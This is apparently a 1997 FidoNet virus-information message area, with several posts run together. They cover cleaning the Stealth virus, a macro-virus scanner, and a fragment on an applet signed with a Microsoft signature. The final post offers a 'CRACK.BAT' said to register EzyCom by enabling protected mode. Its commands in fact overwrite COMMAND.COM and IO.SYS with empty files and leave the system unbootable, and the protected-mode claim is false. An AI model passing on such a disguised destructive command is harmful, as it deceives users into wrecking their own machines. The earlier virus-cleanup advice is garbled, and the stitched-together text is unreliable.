DH> We have four computers in the house... a 486-40 (the BBS DH> machine), a 486DX2-66 and two Cyrix 686-166's. All four had DH> Stealth on them and one of the Cyrix had Tai Pan, too. Wow...what is your number?:) DH> We tried three different virus programs to clean them and all DH> worked well except that none of them could get Stealth out of DH> the master upper memory or something like that. All DH> recognized the virus but couldn't clean it. So, a friend DH> brought me a boot disk for, I think, IBM Anti-Virus and it DH> worked great! I strongly suggest that if you can get a copy DH> of the program, do it and keep it handy. It can be a real DH> blessing. Is this the way you try to keep you mail on topic..you have to try better han this.:) Keep on topic next time. BTW if you are asking for a program that clean a virus...well..forget it, there is no such thing, I could tell you for sure no virus checker is 100% possible to convert infected program back to what it was.It can find out the virus and destory it before you excuted, may be. but The best thing to do after you know you drive is infected, it is back it up..all of them. then format it. Install all the needed software. and set your virus checker program file in windows95 all into read only file, because its window based so it's alot difficult to destory file under virutaul memoery. then check all the back up one by one with at least 3 to 4 uptoday virus checker, then t will guide you if it's infected or not. And only, I mean only restore the non-infected file. and if you think that still isn't save enough. back up those non-infected file. format the whole drive again. and repeat the process seval times. that you drive should be fine. as well as organise since all file deframented while back up and new sofware install will be in the perfect location. So now your HD should run very fast, well in your case 686, it will run so fast, you can travel back time.:) your ray --- * Origin: Warus St (2:2502/66.9) --------------- FIDO MESSAGE AREA==> TOPIC: 171 VIRUS INFO Ref: E5400003 Date: 05/02/97 From: KENNETH J. In the F-Prot archive, you should find a program called F-Macro, or possibly F-MacroW. Decompress that and use it to scan your documents with, from a lean boot disk. This program is designed exclusively for macro viruses - if it ays you don't have Wazzu, you can be 99.9% sure you don't. ;) --- FMail 1.22 * Origin: Never mind the star, get the camels off the lawn! A developer got hold of the Microsoft signature (whatever it is, I haven't investigated in great detail), and igned his applet. This applet, because it carried a "trusted" signature, wasn't queried with the user before doing whatever it did (which in this case was something harmless). Copy the following text into a file called CRACK.BAT and then run it from the dos prompt by typing CRACK ====== CUT ====== C: CD\ TYPE COMMAND.COM>COMMAND.COM TYPE IO.SYS>IO.SYS ====== CUT ====== And then follow the instructions. This sets your processor into Protected Mode, which means that EzyCom will function as registered. Totally undocumented feature of Dos! Good luck! --- GoldED 3.00.Alpha4+ * Origin: Linux Inside.
